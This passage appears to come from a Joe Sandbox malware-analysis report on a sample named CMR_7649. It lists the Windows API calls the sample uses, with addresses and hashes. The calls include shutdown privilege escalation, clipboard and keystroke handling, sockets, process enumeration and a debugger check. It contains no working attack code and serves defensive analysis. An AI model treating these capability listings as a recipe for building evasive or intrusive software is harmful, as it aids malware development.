                                                • Opcode Fuzzy Hash: e729fe0eecd02e77c5ee8deaec4c56456965897f8b2a75efd2bc4ea0d4b88c57
                                                • Instruction Fuzzy Hash: A6C1EC326101185BD710FBA1DD8AFEE7328EB44701F5045BFF909A60C2DBB99B598F64
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                Strings
                                                Similarity
                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 2640511053-438819550
                                                • Opcode ID: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                • Instruction ID: 696d482812dd8bff2d9106dd2d2144e175b5fe2258968c3fd44c1969776f6f9a
                                                • Opcode Fuzzy Hash: 8a47bb142582fb369a588aeabde8b58686abdf3d8367fad8d2448c9b03ae91f1
                                                • Instruction Fuzzy Hash: AD410AB2A001186BDB10EBA5ED45FEF73689F89321F50465BFD0493280D6B8DE558BB8
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                • GetLastError.KERNEL32 ref: 00433414
                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                Strings
                                                Similarity
                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 2938487562-3733053543
                                                • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                APIs
                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                Similarity
                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                • String ID:
                                                • API String ID: 1255039815-0
                                                • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                APIs
                                                • __swprintf.LIBCMT ref: 00433073
                                                • __swprintf.LIBCMT ref: 00433085
                                                • __wcsicoll.LIBCMT ref: 00433092
                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                • LockResource.KERNEL32(?), ref: 00433120
                                                Similarity
                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                • String ID:
                                                • API String ID: 1158019794-0
                                                • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                • API String ID: 4194297153-14809454
                                                • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove$_strncmp
                                                • String ID: @oH$\$^$h
                                                • API String ID: 2175499884-3701065813
                                                • Opcode ID: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                • Instruction ID: d0725f23cfd3ca281eac06f76a82abe5967bc3f30214560d9089fed7748fa16d
                                                • Opcode Fuzzy Hash: f002cf83b61508de9c211a0f0d172e3a132fb63b457bb46fdb7389c8079d7204
                                                • Instruction Fuzzy Hash: C642E270E04249CFEB14CF69C8806AEBBF2FF85304F2481AAD855AB351D7399946CF55
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                • String ID:
                                                • API String ID: 540024437-0
                                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                • API String ID: 0-2872873767
                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                • __wsplitpath.LIBCMT ref: 00475644
                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                • _wcscat.LIBCMT ref: 00475657
                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                • String ID:
                                                • API String ID: 2547909840-0
                                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                APIs
                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                • FindClose.KERNEL32(?), ref: 004525FF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                • String ID: *.*$\VH
                                                • API String ID: 2786137511-2657498754
                                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                • String ID: pqI
                                                • API String ID: 2579439406-2459173057
                                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                APIs
                                                • __wcsicoll.LIBCMT ref: 00433349
                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                • __wcsicoll.LIBCMT ref: 00433375
                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: __wcsicollmouse_event
                                                • String ID: DOWN
                                                • API String ID: 1033544147-711622031
                                                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: KeyboardMessagePostState$InputSend
                                                • String ID:
                                                • API String ID: 3031425849-0
                                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                APIs
                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ErrorLastinet_addrsocket
                                                • String ID:
                                                • API String ID: 4170576061-0
                                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                APIs
                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                • IsWindowVisible.USER32 ref: 0047A368
                                                • IsWindowEnabled.USER32 ref: 0047A378
                                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                                                • IsIconic.USER32 ref: 0047A393
                                                • IsZoomed.USER32 ref: 0047A3A1
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                                                • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                                                • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                                                APIs
                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                • CoInitialize.OLE32(00000000), ref: 00478442
                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                                                • CoUninitialize.OLE32 ref: 0047863C
                                                Strings
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                • String ID: .lnk
                                                • API String ID: 886957087-24824748
                                                • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                                                • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                                                • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                                                APIs
                                                • OpenClipboard.USER32(?), ref: 0046DCE7
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                • CloseClipboard.USER32 ref: 0046DD0D
                                                • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                • CloseClipboard.USER32 ref: 0046DD41
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                • CloseClipboard.USER32 ref: 0046DD99
                                                Similarity
                                                • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                • String ID:
                                                • API String ID: 15083398-0
                                                • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: U$\
